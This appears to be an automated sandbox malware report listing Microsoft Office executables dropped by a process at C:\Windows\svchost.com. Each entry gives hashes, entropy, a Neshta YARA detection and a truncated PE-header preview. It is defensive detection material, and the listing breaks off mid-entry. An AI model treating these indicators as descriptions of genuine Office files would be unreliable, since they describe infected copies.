                                                                                                                        SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                                                                                        SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.268163712816429
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                                                                                        MD5:1EF797E5E199041B8A0EB41A50E73185
                                                                                                                        SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                                                                                        SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                                                                                        SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.201681837230837
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCpSsTITDBkt+ETGBaORneubkuJ:sr85C7IvibTCaOFeubks
                                                                                                                        MD5:D528E65D0A3CFF610803965BAB5D42EE
                                                                                                                        SHA1:A01448DD0C03BAF9B1E287BCB87A58450084BFFA
                                                                                                                        SHA-256:C82DAD16438E79EE2ABC34D1B405F09DE3844FDEF99F9115B58E7D1F7C90C4E9
                                                                                                                        SHA-512:4A0C3C8F49CE25A4D5D06359683DE444EDFC6B49E09323D10F675E5029D584135A80F89A04FE77CB58D4B9BC6522F7E2DC359FC8D6EB8A55F981AB4CC07B91F3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.352529349012904
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCkb7zbeu8L16Ytx2XaRSX2qA4i:sr85Ckb7Heu8LSakmP
                                                                                                                        MD5:2249CAFC0B359EA41F137AB87DC151FA
                                                                                                                        SHA1:DABA42EFF4B9D3251E409CFD98A2BD3B9A672ED3
                                                                                                                        SHA-256:3478297533C741CBF62D8FA8F2D820089E3777EBFD6DCDAD50F8FBCF93FB6304
                                                                                                                        SHA-512:D0684A20BD7449D97323DBBE93467148F7E63DB79EC1BD3AC2E90D1350148EDF6F31E7BBEE1F32773D169CD04E1D11FEF03AE2E2C5637A89288FFB08C8115DB5
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.46773744909196
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxvuAvYalUpgotzYIlHkHwt7//Qt:sr85CqaBotvHkHwK
                                                                                                                        MD5:F3279F5053B3112B5299C08136AE58E9
                                                                                                                        SHA1:5B4C8EA82DC1E296CB31EC7B439B8B6E52795995
                                                                                                                        SHA-256:1A1E7090747C3F600989939E12DA73BD2E85FFCAD10159E7AC52D374DA11874A
                                                                                                                        SHA-512:86A355429C9358EEC0FE6B95623DC26FE7879684CDDB6AEAE293276FC5D604CC37DE64FC520F0EE749A3F6A15E9D5FB53852F9B444A0B3DE1374077578A99564
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4135504331115705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCC+MHzv1nArfoWBgJCSTgHyyf:sr85CDuv1nqQ2zSESy
                                                                                                                        MD5:A937F48D8198AB59DF93A63E834C4AAF
                                                                                                                        SHA1:4DA8ED9F7A886A8437562470A199744DF6E88F24
                                                                                                                        SHA-256:CA2CA4A45AB550D894AA4B16919FF38ABB7784E532C327891DF71645AB845C6A
                                                                                                                        SHA-512:490CDFC2D7AAF7142889398D70DE668CCCD8D4A52AF7C5FA9D64540CE2740F09A481293F4DFFED1ECCED9827148313D2296CC9BFC9716A88814544930C9DE551
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.344917752925491
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCDt+pejhS5enb1o24/tmIY514oZFt4s:sr85CDt+pGQ5E1o24VmIYX4oZP4s
                                                                                                                        MD5:EA546BBE947027BA147DE2719F53D051
                                                                                                                        SHA1:38B150F5A8BE8E19B5D1F2824F8EDE784DE2C6E6
                                                                                                                        SHA-256:930F29A1D4152D23CB5F1E60693191F2865F56EA5474BF720BDC286D518CD9C1
                                                                                                                        SHA-512:D456962B5511F76AF309345C22FCB20EDB120CF4EC3388300FEE1864B13859C605C40B6E86357E698DACA5AED60F56B59DFF1655E3059A9065B9550A7A3C9E1E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.464347380493513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCSGNDd85lS8adLs4XK9OtiRk+7mLpNKahE:sr85C9NDS5lS8D0K8tMk+7ms
                                                                                                                        MD5:072EDD1A5D3A99C26EA9987890989B31
                                                                                                                        SHA1:6ECC5A3EBEB7EC6EEBBEF28CEB67079A92F57107
                                                                                                                        SHA-256:598CA2D9EB855C5D53C9C19374AFFAAE2E4A6A9C9EBF1F46D2B025B5BD8731B4
                                                                                                                        SHA-512:D11D018159148C9926450A3047B207484D1B31B80BB975B435D6E0FEB497F60625450273C1D834FFAD74C7C581A80224898FDCDC41BB9D3BD799E70AE8EF838E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.4498443082331764
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCLddbrls2itD1NrBOTe5IfY2X36Be:sr85CjbO1OTqcX36Be
                                                                                                                        MD5:187B658322698CB74D48476EB2ECB171
                                                                                                                        SHA1:3C4371425F833F6C7643E09BEBA5762B67081611
                                                                                                                        SHA-256:7460BB6E5A2E43F3C737730FE5F9FC5E199072C61B870C07FF35207F333EE496
                                                                                                                        SHA-512:3013808486F1445457BC00B919AFDCC46297B3F167A876EE5F028D50456EBE582C05882D99A0E677531C9FD3796F574AD88AB48FBF394A124F425894F841D636
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.336782734218808
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCEbf/h1xmGzUiVZd0p813HmTJhM3:sr85CMfJ1xmzsHmTHM3
                                                                                                                        MD5:A3977FA0A7C20B05EC69FADE4F852D71
                                                                                                                        SHA1:FE2C747F4DA1C5C85C55EB755CA32D59B0B1EC43
                                                                                                                        SHA-256:1F3B9AB4F318C962967E9418DFEEBF251EF610A0ECE5570E166D84B6A730A932
                                                                                                                        SHA-512:CD8082F275380F4CD67BA08904C116E921C428D8D6BD8BF411A93B42CA9276332AB6E7F46EEC05C697662A98CC70841D12AD3EA6A3DE54EB575DE11BF2A0A1B2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.531432224892055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCN5Ss6w5T7tIc+9KLSifgpM5:sr85CrSsp+9KSM5
                                                                                                                        MD5:A651847108A83A8B2A3B75A66403B0DC
                                                                                                                        SHA1:EA7CFC3C984B676C322578E80DCD78DDA75E5A2C
                                                                                                                        SHA-256:A1616D454E5EE365285A3E03455CED1FD70D8EEB682D47A8379EB08CF801D325
                                                                                                                        SHA-512:0B97CD6F46A4660C27E99F140D07BA7F0F380E32062D5F9AF550C161E0191332EB27A196C5CAEFEB94A091CF9294FFEE91604D0FEF329260F768D9669591E2CE
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.556968630457308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVFFlJhOo/ovdHk4h6zeXVv:sr85CVFFlJhOoGt66F
                                                                                                                        MD5:FB0697C512E65305CF24EFA18EC58086
                                                                                                                        SHA1:B924F5AFE1A14163E20DB2CDCE980017C1461D1E
                                                                                                                        SHA-256:CCA73F1C0206BBB9D6567616808D4BADAFAB7796ED40FC86097032802F2381D3
                                                                                                                        SHA-512:FA3AD9699129E24AEAC778B38EF1B6CEBA11B226E6636635224FCB9019036D9E11726F11F50A9D1D531A8A6F08B5D3A3B650E7416655113284B63412C01B1F60
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.131108501135707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJaFFlJhl7XC0dHPgzh263DX:JxqjQ+P04wsmJCVFFlJhlLDHmdzX
                                                                                                                        MD5:2DCEF042EE374AC5BA2307EE6D97FFAE
                                                                                                                        SHA1:3E39AD4F60367BAFB47B3759253064F7BA57A92B
                                                                                                                        SHA-256:C83153D11C1D63FF5C330035DD66A958BF19EC465969D82DE87351A2C5F7A99D
                                                                                                                        SHA-512:9319A16EA4B3D49FC1CFC4FE9E5890E2DDAA3E5D1523A150C77E0201C727EA0580E0B2D79CD4914968305B037B987494D57604E4792790069E992EEEE3D5324B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254281392784178
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJrBE27rCNzU3GLCAAhUSCr1HkueFNUx+:JxqjQ+P04wsmJCKEJzbmAoDucEMQnF0
                                                                                                                        MD5:D7BF211CED7D30A27312CE4DA2487EE1
                                                                                                                        SHA1:CE664FBA8F5BEAA728CB7EAE107C5ED3810A5DDF
                                                                                                                        SHA-256:9266432725D9466253A4F1F609C9A2DD85FC82B3A0E3A6C43FCB1A267C976265
                                                                                                                        SHA-512:260EA864A9512B243DD18EC3C4D6CA7782DD3ED117AA553E6C30F3249655EEDB3768AC190432CBA66078F93C83F8B05CAB352B254FB58C3586EF56F2C3482EED
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.369176164130001
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmmgFboVWAfMOD9nwcP4McxAF+V2r9Q:sr85CmhFbG5n7vcxAwVIu
                                                                                                                        MD5:E883EB6C4D29614F1887EDF6A2412659
                                                                                                                        SHA1:33DAF7D41A5C6D4D8AB1C91160F775D9810E10F9
                                                                                                                        SHA-256:BE47F38C1D1A3806AD27867DF41BF62AFB77FADCAD4F00CF3B68FD469E1B2154
                                                                                                                        SHA-512:EF18F22EB51AE378651FD7421E56EC682BE64AED01D79FDC1E3366459690AE52E312B4BE3A70C50653EC98C261EE2557C4B4F908AC8254E47B96F7268847F665
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.694866680260046
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC5wI4PqxgWvwG+TUawK:sr85C5wslwG+TUawK
                                                                                                                        MD5:A851E7A4D035C32FCB2830718B34F01C
                                                                                                                        SHA1:6D89FD230ADE8F14971A600591A8B6FAF67CD770
                                                                                                                        SHA-256:73610C44EE38B1785E018C2BC869052729D56C65545F52EE5D2AB89C8C7B6DCE
                                                                                                                        SHA-512:77726930C4BFE2DF33FCADA1A4A493F8DB8B3A5681C5D79DC51F9625C4110680DFA50C44CA272B71E46175FF56954B1583B9771B73412D25D06954AF8AAF81E8
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.511827025814232
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCHz6xccTu/YnwN9+ko47VGsKkfrwayHd+f:sr85CT6yHYn+o4Jrn
                                                                                                                        MD5:2DBF9767B1524319753ADE899740500C
                                                                                                                        SHA1:D684A9E8CC28A5185CF477554DF2065D73126877
                                                                                                                        SHA-256:14143B435D60E49B251E80E37857E98D36088EB0CBE02C4C630F381E37BA8F0B
                                                                                                                        SHA-512:A7B9EA44485796E0AA8C51A2A762EA95640EE34FEA51C3F043A5EC37E99EE95054F610C8FB72C445609F90B6EBFA5590036294B8E4770BD483E8926B38C7BDB3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.361986604416892
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC4QTS8CYtvYSi+GAqeqCifxUajaQ:sr85C42S8/caAUSaQ
                                                                                                                        MD5:8F8291D79A298A9B071864C651BB0794
                                                                                                                        SHA1:F7614B1E0D476F1CBC75B5D698711F9DF460F773
                                                                                                                        SHA-256:E9562B1B83495930753D145E9834CCA9128745E3163C060A4AA3D7DA62AA468F
                                                                                                                        SHA-512:160D10672400D32BB10A059CC2AF3CA79810A9D0FDB88B79F6E0BB208DA26F973965853A429A7D9D4CD30570E015F17EB458DF6C6311BB89394AF46ED8B189E7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.56237653560924
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ/MyzuDxqDq2m1eHwSFdrdAHZY:JxqjQ+P04wsmJCOxzuDxqDsmwSFbuY
                                                                                                                        MD5:2CF8F2ECEB42B70A5493D1EAEAC6B20A
                                                                                                                        SHA1:B411993C6352F4B026153AE4010A6C2D7B1ACE3B
                                                                                                                        SHA-256:A85EB54DE3BE548DBE89BC47098B417F4C1029BA084D0B15F75687D0751EF44E
                                                                                                                        SHA-512:8D2514F16C8D47CE668397B6DEF1A59A4D2C7B7E4A8E7613865C4833BE0B882D87AECB02C049B7496D633CA740DEB33A59DE6D0488F21C26109C89F8C511570D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
